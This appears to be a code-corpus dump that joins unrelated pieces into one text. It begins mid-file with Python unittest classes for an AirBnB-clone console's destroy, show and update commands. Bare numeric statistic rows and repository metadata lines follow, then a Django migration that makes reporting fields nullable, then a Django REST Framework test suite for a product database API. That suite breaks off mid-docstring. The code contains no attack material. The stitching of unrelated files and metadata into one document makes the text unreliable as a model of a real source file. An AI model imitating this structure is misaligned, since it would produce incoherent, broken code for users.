            HBNBCommand().onecmd("toto.destroy()")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")

    def testDestroyMissingIdSpaceNotation(self):
        """
        destroy missing id command
        """
        for className in self.__classes:
            self.__missingIdSpaceNotation(className)

    def testDestroyMissingIdDotNotation(self):
        """
        destroy() missing id command
        """
        for className in self.__classes:
            self.__missingIdDotNotation(className)

    def testDestroyNoInstanceFoundSpaceNotation(self):
        """
        destroy no instance command
        """
        for className in self.__classes:
            self.__noInstanceFoundSpaceNotation(className)

    def testDestroyNoInstanceFoundDotNotation(self):
        """
        destroy() no instance command
        """
        for className in self.__classes:
            self.__noInstanceFoundDotNotation(className)

    def testDestroyInstanceSpaceNotation(self):
        """
        destroy instance command
        """
        for className in self.__classes:
            self.__destroyInstanceSpaceNotation(className)

    def testDestroyInstanceDotNotation(self):
        """
        destroy() instance command
        """
        for className in self.__classes:
            self.__destroyInstanceDotNotation(className)

    def __missingIdSpaceNotation(self, prmClassName: str):
        """``destroy <Class>`` without an id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "destroy {}".format(prmClassName)))
            self.assertEqual("** instance id missing **",
                             output.getvalue().strip())

    def __missingIdDotNotation(self, prmClassName: str):
        """``<Class>.destroy()`` without an id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy()".format(prmClassName)))
            self.assertEqual("** instance id missing **",
                             output.getvalue().strip())

    def __noInstanceFoundSpaceNotation(self, prmClassName: str):
        """``destroy <Class> 1`` with an unknown id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "destroy {} 1".format(prmClassName)))
            self.assertEqual("** no instance found **",
                             output.getvalue().strip())

    def __noInstanceFoundDotNotation(self, prmClassName: str):
        """``<Class>.destroy(1)`` with an unknown id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy(1)".format(prmClassName)))
            self.assertEqual("** no instance found **",
                             output.getvalue().strip())

    def __destroyInstanceSpaceNotation(self, prmClassName):
        """Create, destroy via space notation, check it left storage."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()  # renamed (builtin shadow)
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            command = "destroy {} {}".format(prmClassName, obj_id)
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertNotIn(obj, storage.all())

    def __destroyInstanceDotNotation(self, prmClassName):
        """Create, destroy via dot notation, check it left storage."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            command = "{}.destroy({})".format(prmClassName, obj_id)
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertNotIn(obj, storage.all())

    def __getObj(self, prmClassName: str, prmUuid: str):
        """Fetch the stored object for ``<Class>.<uuid>``."""
        return storage.all()["{}.{}".format(prmClassName, prmUuid)]
class ConsoleShowTest(unittest.TestCase):
    """Tests for the ``show`` command in both space and dot notation."""

    __classes = [
        'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
    ]

    def setUp(self):
        """Stash any pre-existing file.json and reset the object store."""
        try:
            os.rename("file.json", "tmp")
        except IOError:
            pass
        # Bug fix: ``FileStorage.__objects`` written inside this class
        # mangles to ``_ConsoleShowTest__objects``; reset the real store.
        # @classmethod was also dropped — setUp/tearDown are instance hooks.
        FileStorage._FileStorage__objects = {}

    def tearDown(self):
        """Remove the test file.json and restore the stashed original."""
        try:
            os.remove("file.json")
        except IOError:
            pass
        try:
            os.rename("tmp", "file.json")
        except IOError:
            pass

    def testShowMissingClass(self):
        """
        show() missing class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("show")
            self.assertEqual(output.getvalue(), "** class name missing **\n")

    def testInvalidClass(self):
        """
        show() invalid class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("show toto")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("toto.show()")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")

    def testMissingIdSpaceNotation(self):
        """
        show missing id command
        """
        for className in self.__classes:
            self.__missingIdSpaceNotation(className)

    def testMissingIdDotNotation(self):
        """
        show() missing id command
        """
        for className in self.__classes:
            self.__missingIdDotNotation(className)

    def testNoInstanceFoundSpaceNotation(self):
        """
        show no instance command
        """
        for className in self.__classes:
            self.__noInstanceFoundSpaceNotation(className)

    def testNoInstanceFoundDotNotation(self):
        """
        show() no instance command
        """
        for className in self.__classes:
            self.__noInstanceFoundDotNotation(className)

    def testShowInstanceSpaceNotation(self):
        """
        show instance command
        """
        for className in self.__classes:
            self.__showInstanceSpaceNotation(className)

    def testShowInstanceDotNotation(self):
        """
        show() instance command
        """
        for className in self.__classes:
            self.__showInstanceDotNotation(className)

    def __missingIdSpaceNotation(self, prmClassName: str):
        """``show <Class>`` without an id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "show {}".format(prmClassName)))
            self.assertEqual("** instance id missing **",
                             output.getvalue().strip())

    def __missingIdDotNotation(self, prmClassName: str):
        """``<Class>.show()`` without an id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.show()".format(prmClassName)))
            self.assertEqual("** instance id missing **",
                             output.getvalue().strip())

    def __noInstanceFoundSpaceNotation(self, prmClassName: str):
        """``show <Class> 1`` with an unknown id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "show {} 1".format(prmClassName)))
            self.assertEqual("** no instance found **",
                             output.getvalue().strip())

    def __noInstanceFoundDotNotation(self, prmClassName: str):
        """``<Class>.show(1)`` with an unknown id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.show(1)".format(prmClassName)))
            self.assertEqual("** no instance found **",
                             output.getvalue().strip())

    def __showInstanceSpaceNotation(self, prmClassName):
        """Create, show via space notation, compare to __str__, destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()  # renamed (builtin shadow)
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            command = "show {} {}".format(prmClassName, obj_id)
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertEqual(obj.__str__(), output.getvalue().strip())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __showInstanceDotNotation(self, prmClassName):
        """Create, show via dot notation, compare to __str__, destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            command = "{}.show({})".format(prmClassName, obj_id)
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertEqual(obj.__str__(), output.getvalue().strip())
        # Bug fix: the original destroyed the instance twice (space then dot
        # notation); the second destroy could only print "no instance found".
        # Keep the dot-notation destroy for symmetry with this helper.
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __getObj(self, prmClassName: str, prmUuid: str):
        """Fetch the stored object for ``<Class>.<uuid>``."""
        return storage.all()["{}.{}".format(prmClassName, prmUuid)]
class ConsoleUpdateTest(unittest.TestCase):
    """Tests for the ``update`` command (space, dot and JSON notations)."""

    __classes = [
        'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
    ]

    def setUp(self):
        """Stash any pre-existing file.json and reset the object store."""
        try:
            os.rename("file.json", "tmp")
        except IOError:
            pass
        # Bug fix: ``FileStorage.__objects`` written inside this class
        # mangles to ``_ConsoleUpdateTest__objects``; reset the real store.
        # @classmethod was also dropped — setUp/tearDown are instance hooks.
        FileStorage._FileStorage__objects = {}

    def tearDown(self):
        """Remove the test file.json and restore the stashed original."""
        try:
            os.remove("file.json")
        except IOError:
            pass
        try:
            os.rename("tmp", "file.json")
        except IOError:
            pass

    def testShowMissingClass(self):
        """
        update() missing class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("update")
            self.assertEqual(output.getvalue(), "** class name missing **\n")

    def testInvalidClass(self):
        """
        update() invalid class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("update toto")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("toto.update()")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")

    def testMissingIdSpaceNotation(self):
        """
        update missing id command
        """
        for className in self.__classes:
            self.__missingIdSpaceNotation(className)

    def testMissingIdDotNotation(self):
        """
        update() missing id command
        """
        for className in self.__classes:
            self.__missingIdDotNotation(className)

    def testNoInstanceFoundSpaceNotation(self):
        """
        update no instance command
        """
        for className in self.__classes:
            self.__noInstanceFoundSpaceNotation(className)

    def testNoInstanceFoundDotNotation(self):
        """
        update() no instance command
        """
        for className in self.__classes:
            self.__noInstanceFoundDotNotation(className)

    def testMissingAttributeSpaceNotation(self):
        """
        update missing attribute command
        """
        for className in self.__classes:
            self.__missingAttributeSpaceNotation(className)

    def testMissingAttributeDotNotation(self):
        """
        update() missing attribute command
        """
        for className in self.__classes:
            self.__missingAttributeDotNotation(className)

    def testUpdateInstanceSpaceNotation(self):
        """
        update instance command
        """
        for className in self.__classes:
            self.__updateInstanceSpaceNotation(className)

    def testUpdateInstanceDotNotation(self):
        """
        update() instance command
        """
        for className in self.__classes:
            self.__updateInstanceDotNotation(className)
            self.__updateInstanceWithJSONDotNotation(className)

    def __missingIdSpaceNotation(self, prmClassName: str):
        """``update <Class>`` without an id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "update {}".format(prmClassName)))
            self.assertEqual("** instance id missing **",
                             output.getvalue().strip())

    def __missingIdDotNotation(self, prmClassName: str):
        """``<Class>.update()`` without an id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.update()".format(prmClassName)))
            self.assertEqual("** instance id missing **",
                             output.getvalue().strip())

    def __noInstanceFoundSpaceNotation(self, prmClassName: str):
        """``update <Class> 1`` with an unknown id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "update {} 1".format(prmClassName)))
            self.assertEqual("** no instance found **",
                             output.getvalue().strip())

    def __noInstanceFoundDotNotation(self, prmClassName: str):
        """``<Class>.update(1)`` with an unknown id must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.update(1)".format(prmClassName)))
            self.assertEqual("** no instance found **",
                             output.getvalue().strip())

    def __missingAttributeSpaceNotation(self, prmClassName: str):
        """``update <Class> <id>`` without an attribute must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()  # renamed (builtin shadow)
        # (dropped an unused ``obj`` lookup the original performed here)
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "update {} {}".format(prmClassName, obj_id)))
            self.assertEqual("** attribute name missing **",
                             output.getvalue().strip())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __missingAttributeDotNotation(self, prmClassName: str):
        """``<Class>.update("<id>")`` without an attribute must complain."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.update(\"{}\")".format(prmClassName, obj_id)))
            self.assertEqual("** attribute name missing **",
                             output.getvalue().strip())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __updateInstanceSpaceNotation(self, prmClassName):
        """Create, set first_name via space notation, verify, destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            self.assertNotIn("first_name", obj.__dict__.keys())
            command = "update {} {} {} {}".format(
                prmClassName, obj_id, "first_name", "john")
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertEqual(obj.first_name, "john")
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __updateInstanceDotNotation(self, prmClassName):
        """Create, set first_name via dot notation, verify, destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            self.assertNotIn("first_name", obj.__dict__.keys())
            command = "{}.update(\"{}\", \"{}\", \"{}\")".format(
                prmClassName, obj_id, "first_name", "john")
            self.assertFalse(HBNBCommand().onecmd(command))
            obj = self.__getObj(prmClassName, obj_id)
            self.assertIn("first_name", obj.__dict__.keys())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __updateInstanceWithJSONDotNotation(self, prmClassName):
        """Create, set first_name via a JSON dict payload, verify, destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()
        with patch("sys.stdout", new=StringIO()) as output:
            obj = self.__getObj(prmClassName, obj_id)
            self.assertNotIn("first_name", obj.__dict__.keys())
            jsonData = "{'first_name': 'john'}"
            command = "{}.update(\"{}\", {})".format(
                prmClassName, obj_id, jsonData)
            self.assertFalse(HBNBCommand().onecmd(command))
            obj = self.__getObj(prmClassName, obj_id)
            self.assertIn("first_name", obj.__dict__.keys())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __getObj(self, prmClassName: str, prmUuid: str):
        """Fetch the stored object for ``<Class>.<uuid>``."""
        return storage.all()["{}.{}".format(prmClassName, prmUuid)]
| 37.344
| 87
| 0.575897
| 2,935
| 32,676
| 6.322317
| 0.071891
| 0.075124
| 0.051735
| 0.077603
| 0.824908
| 0.818495
| 0.812352
| 0.812352
| 0.808364
| 0.797424
| 0
| 0.000732
| 0.289662
| 32,676
| 874
| 88
| 37.386728
| 0.798716
| 0.037979
| 0
| 0.71637
| 0
| 0
| 0.105809
| 0
| 0
| 0
| 0
| 0
| 0.197731
| 1
| 0.145867
| false
| 0.029173
| 0.012966
| 0.004862
| 0.186386
| 0.001621
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8a07a91a62ea805fcd842b06bbfc0b66c527af4
| 2,058
|
py
|
Python
|
usaspending_api/reporting/migrations/0006_auto_20210423_1715.py
|
ststuck/usaspending-api
|
b13bd5bcba0369ff8512f61a34745626c3969391
|
[
"CC0-1.0"
] | 217
|
2016-11-03T17:09:53.000Z
|
2022-03-10T04:17:54.000Z
|
usaspending_api/reporting/migrations/0006_auto_20210423_1715.py
|
Hk92a/usaspending-api
|
25daa9dbc30835b8f4b4c797c592ba9ecc78ca00
|
[
"CC0-1.0"
] | 622
|
2016-09-02T19:18:23.000Z
|
2022-03-29T17:11:01.000Z
|
usaspending_api/reporting/migrations/0006_auto_20210423_1715.py
|
Hk92a/usaspending-api
|
25daa9dbc30835b8f4b4c797c592ba9ecc78ca00
|
[
"CC0-1.0"
] | 93
|
2016-09-07T20:28:57.000Z
|
2022-02-25T00:25:27.000Z
|
# Generated by Django 2.2.18 on 2021-04-23 17:15
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax NOT NULL constraints on reporting_agency_overview columns."""

    dependencies = [
        ('reporting', '0005_auto_20210202_2235'),
    ]

    # One AlterField per column, in the original operation order: count
    # columns become nullable IntegerFields, amount columns nullable
    # DecimalFields.
    operations = [
        migrations.AlterField(
            model_name='reportingagencyoverview',
            name=column_name,
            field=nullable_field,
        )
        for column_name, nullable_field in [
            ('linked_assistance_awards',
             models.IntegerField(null=True)),
            ('linked_procurement_awards',
             models.IntegerField(null=True)),
            ('total_budgetary_resources',
             models.DecimalField(decimal_places=2, max_digits=23, null=True)),
            ('total_diff_approp_ocpa_obligated_amounts',
             models.DecimalField(decimal_places=2, max_digits=23, null=True)),
            ('total_dollars_obligated_gtas',
             models.DecimalField(decimal_places=2, max_digits=23, null=True)),
            ('unlinked_assistance_c_awards',
             models.IntegerField(null=True)),
            ('unlinked_assistance_d_awards',
             models.IntegerField(null=True)),
            ('unlinked_procurement_c_awards',
             models.IntegerField(null=True)),
            ('unlinked_procurement_d_awards',
             models.IntegerField(null=True)),
        ]
    ]
| 34.881356
| 82
| 0.624393
| 181
| 2,058
| 6.856354
| 0.303867
| 0.145044
| 0.181305
| 0.210314
| 0.804996
| 0.804996
| 0.804996
| 0.718775
| 0.718775
| 0.714746
| 0
| 0.027609
| 0.278426
| 2,058
| 58
| 83
| 35.482759
| 0.808081
| 0.022352
| 0
| 0.692308
| 1
| 0
| 0.246269
| 0.241791
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d8ddcb47d320e4af2507c3590177f331e78e3547
| 101,921
|
py
|
Python
|
app/productdb/tests/test_productdb_api_views.py
|
gaetoleole/product-database
|
191b304600d6f069d57ab3d0c28886e7e6545231
|
[
"MIT"
] | null | null | null |
app/productdb/tests/test_productdb_api_views.py
|
gaetoleole/product-database
|
191b304600d6f069d57ab3d0c28886e7e6545231
|
[
"MIT"
] | null | null | null |
app/productdb/tests/test_productdb_api_views.py
|
gaetoleole/product-database
|
191b304600d6f069d57ab3d0c28886e7e6545231
|
[
"MIT"
] | null | null | null |
"""
Test suite for the productdb.api_views module
"""
import pytest
from urllib.parse import quote
import requests
from django.utils.dateformat import DateFormat
from django.utils.formats import get_format
from django.conf import settings
from django.contrib.auth.models import User, Permission
from django.core.urlresolvers import reverse
from django.utils.datetime_safe import date, datetime
from mixer.backend.django import mixer
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from app.config.models import NotificationMessage
from app.productdb.models import Vendor, ProductGroup, Product, ProductList, ProductMigrationOption, \
ProductMigrationSource
# every test in this module touches the database
pytestmark = pytest.mark.django_db
# credentials of a regular (non-admin) API account -- presumably created by the
# import_default_users fixture; verify against the fixture definition
AUTH_USER = {
    "username": "api",
    "password": "api"
}
# credentials of the superuser account
SUPER_USER = {
    "username": "pdb_admin",
    "password": "pdb_admin"
}
# resolved REST endpoint URLs; the "%d/" suffixes are detail-route templates
# that get a primary key substituted before use
REST_TOKEN_AUTH = reverse("productdb:api-token-auth")
REST_VENDOR_LIST = reverse("productdb:vendors-list")
REST_VENDOR_DETAIL = REST_VENDOR_LIST + "%d/"
REST_PRODUCT_GROUP_LIST = reverse("productdb:productgroups-list")
REST_PRODUCT_GROUP_COUNT = REST_PRODUCT_GROUP_LIST + "count/"
REST_PRODUCT_GROUP_DETAIL = REST_PRODUCT_GROUP_LIST + "%d/"
REST_PRODUCT_LIST = reverse("productdb:products-list")
REST_PRODUCT_COUNT = REST_PRODUCT_LIST + "count/"
REST_PRODUCT_DETAIL = REST_PRODUCT_LIST + "%d/"
REST_PRODUCTLIST_LIST = reverse("productdb:productlists-list")
REST_PRODUCTLIST_DETAIL = REST_PRODUCTLIST_LIST + "%d/"
REST_PRODUCTMIGRATIONSOURCE_LIST = reverse("productdb:productmigrationsources-list")
REST_PRODUCTMIGRATIONSOURCE_DETAIL = REST_PRODUCTMIGRATIONSOURCE_LIST + "%d/"
REST_PRODUCTMIGRATIONOPTION_LIST = reverse("productdb:productmigrationoptions-list")
REST_PRODUCTMIGRATIONOPTION_DETAIL = REST_PRODUCTMIGRATIONOPTION_LIST + "%d/"
REST_NOTIFICATIONMESSAGES_LIST = reverse("productdb:notificationmessages-list")
REST_NOTIFICATIONMESSAGES_DETAIL = REST_NOTIFICATIONMESSAGES_LIST + "%d/"
# endpoints exercised by the common-behavior tests (auth, permissions, renderers)
COMMON_API_ENDPOINT_BEHAVIOR = [
    REST_VENDOR_LIST,
    REST_VENDOR_DETAIL % 1,
    REST_PRODUCT_GROUP_LIST,
    REST_PRODUCT_GROUP_DETAIL % 1,
    REST_PRODUCTLIST_LIST,
    REST_PRODUCTLIST_DETAIL % 1,
    REST_PRODUCTMIGRATIONSOURCE_LIST,
    REST_PRODUCTMIGRATIONSOURCE_DETAIL % 1,
    REST_PRODUCTMIGRATIONOPTION_LIST,
    REST_PRODUCTMIGRATIONOPTION_DETAIL % 1,
    REST_NOTIFICATIONMESSAGES_LIST
]
@pytest.fixture
def common_api_endpoint_objects():
    """Create the database objects required by the common API endpoint tests."""
    for model_label in ("productdb.ProductGroup",
                       "productdb.ProductMigrationSource",
                       "productdb.ProductMigrationOption"):
        mixer.blend(model_label)
@pytest.mark.usefixtures("common_api_endpoint_objects")
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestCommonAPIEndpoint:
    """Test Django REST Framework API behavior shared by all endpoints."""

    def test_unauthorized_access(self):
        """All endpoints reject anonymous requests with 401 and a JSON error body."""
        client = APIClient()
        for url in COMMON_API_ENDPOINT_BEHAVIOR:
            response = client.get(url)
            assert response.status_code == status.HTTP_401_UNAUTHORIZED, "Unauthorized access not allowed by default"
            assert response["Content-Type"] == "application/json", "Should use JSON by default"
            assert response.json() == {"detail": "Authentication credentials were not provided."}

    def test_invalid_authentication(self):
        """A login attempt with a wrong password leaves the client anonymous."""
        client = APIClient()
        # the wrong password makes login() fail, so the requests below are
        # effectively unauthenticated
        client.login(username="api", password="invalid password")
        for url in COMMON_API_ENDPOINT_BEHAVIOR:
            response = client.get(url)
            assert response.status_code == status.HTTP_401_UNAUTHORIZED
            assert response.json() == {'detail': 'Authentication credentials were not provided.'}

    def test_invalid_permissions(self):
        """An authenticated user without model permissions cannot POST anywhere."""
        client = APIClient()
        client.login(**AUTH_USER)
        for url in COMMON_API_ENDPOINT_BEHAVIOR:
            response = client.post(url)
            assert response.status_code == status.HTTP_403_FORBIDDEN
            assert response.json() == {'detail': 'You do not have permission to perform this action.'}

    def test_xml_renderer(self):
        """smoke test to verify, that the XML renderer works. Only an XML renderer is implemented therefore write
        operations using XML are not possible"""
        # 49 products (same count as the original `range(1, 50)` loop); the
        # blended instances are only needed in the database, not as locals
        for _ in range(49):
            mixer.blend("productdb.Product")
        test_queries = [
            REST_VENDOR_LIST,
            REST_PRODUCT_GROUP_LIST,
            REST_PRODUCTLIST_LIST,
            REST_PRODUCTMIGRATIONSOURCE_LIST,
            REST_PRODUCTMIGRATIONOPTION_LIST,
        ]
        client = APIClient()
        client.login(**AUTH_USER)
        for url in test_queries:
            response = client.get(url + "?format=xml")
            assert response.status_code == status.HTTP_200_OK

    def test_page_size(self):
        """Verify the default page size (25) and the custom ?page_size parameter."""
        # 49 products are blended here; the asserts below expect 50 total, so the
        # common_api_endpoint_objects fixture appears to add one more product
        # implicitly through the ProductMigrationOption foreign key -- TODO confirm
        for _ in range(49):
            mixer.blend("productdb.Product")
        client = APIClient()
        client.login(**AUTH_USER)
        # default page size is 25
        response = client.get(REST_PRODUCT_LIST)
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert jdata["pagination"]["page_records"] == 25, "default page size is 25"
        assert jdata["pagination"]["total_records"] == 50, "total records should be all products"
        # test custom page size
        response = client.get(REST_PRODUCT_LIST + "?page_size=40")
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert jdata["pagination"]["page_records"] == 40, "should contain 40 elements"
        assert jdata["pagination"]["total_records"] == 50, "total records should be all products"

    def test_token_authentication(self):
        """A valid username/password POST on the token endpoint yields an API token."""
        for _ in range(49):
            mixer.blend("productdb.Product")
        client = APIClient()
        client.login(**AUTH_USER)
        # get a token by posting the username and password to the API endpoint
        # (pass a copy so the module-level credential dict cannot be mutated)
        response = client.post(REST_TOKEN_AUTH, data=dict(AUTH_USER))
        assert response.status_code == status.HTTP_200_OK
        assert "token" in response.json()
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestVendorAPIEndpoint:
    """
    Django REST Framework API endpoint tests for the Vendor model
    """

    @staticmethod
    def _client_with_permission(codename):
        """Create a throwaway user holding only the given productdb permission and
        return an APIClient logged in as that user.

        Extracted because the add/change/delete tests repeated this setup verbatim.
        """
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename=codename)
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.%s" % codename)
        client = APIClient()
        client.login(username=test_user, password=test_user)
        return client

    def test_token_authentication(self, live_server):
        """A valid API token is accepted, an invalid one is rejected with 401."""
        token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
        response = requests.get(live_server + REST_VENDOR_LIST, headers={
            "Authorization": "Token %s" % token.key
        })
        assert response.status_code == status.HTTP_200_OK, response.text
        response = requests.get(live_server + REST_VENDOR_LIST, headers={
            "Authorization": "Token invalid_token"
        })
        assert response.status_code == status.HTTP_401_UNAUTHORIZED

    def test_read_access_with_authenticated_user(self):
        """The vendor list returns the three default vendors for any authenticated user."""
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 3,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 3
            },
            "data": [
                {
                    "name": "unassigned",
                    "id": 0,
                    "url": "http://testserver/productdb/api/v1/vendors/0/"
                },
                {
                    "name": "Cisco Systems",
                    "id": 1,
                    "url": "http://testserver/productdb/api/v1/vendors/1/"
                },
                {
                    "name": "Juniper Networks",
                    "id": 2,
                    "url": "http://testserver/productdb/api/v1/vendors/2/"
                }
            ]
        }
        client = APIClient()
        client.login(**AUTH_USER)
        response = client.get(REST_VENDOR_LIST)
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not found in result"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # access first element of the list
        response = client.get(jdata["data"][0]["url"])
        assert response.status_code == status.HTTP_200_OK
        assert jdata["data"][0] == response.json()

    def test_add_access_with_permission(self):
        """POST is rejected with 405 even when the user holds the add permission."""
        client = self._client_with_permission("add_vendor")
        response = client.post(REST_VENDOR_LIST, data={"name": "Awesome Vendor"})
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "POST" not allowed.'}
        assert Vendor.objects.count() == 3, "no additional vendor is created"

    def test_change_access_with_permission(self):
        """PUT is rejected with 405 even when the user holds the change permission."""
        client = self._client_with_permission("change_vendor")
        response = client.put(REST_VENDOR_DETAIL % 1, data={"name": "renamed vendor"})
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "PUT" not allowed.'}

    def test_delete_access_with_permission(self):
        """DELETE is rejected with 405 even when the user holds the delete permission."""
        client = self._client_with_permission("delete_vendor")
        response = client.delete(REST_VENDOR_DETAIL % 1)
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
        assert Vendor.objects.count() == 3, "no vendor was deleted"

    def test_delete_unassigned_vendor_as_superuser(self):
        """Even a superuser cannot delete a vendor through the read-only endpoint."""
        # not possible due to limitations in the model implementation
        client = APIClient()
        client.login(**SUPER_USER)
        response = client.delete(REST_VENDOR_DETAIL % 0)
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
        assert Vendor.objects.count() == 3, "no vendor was deleted"

    def test_search_field(self):
        """
        search field implementation contains a regular expression search on the vendor name field
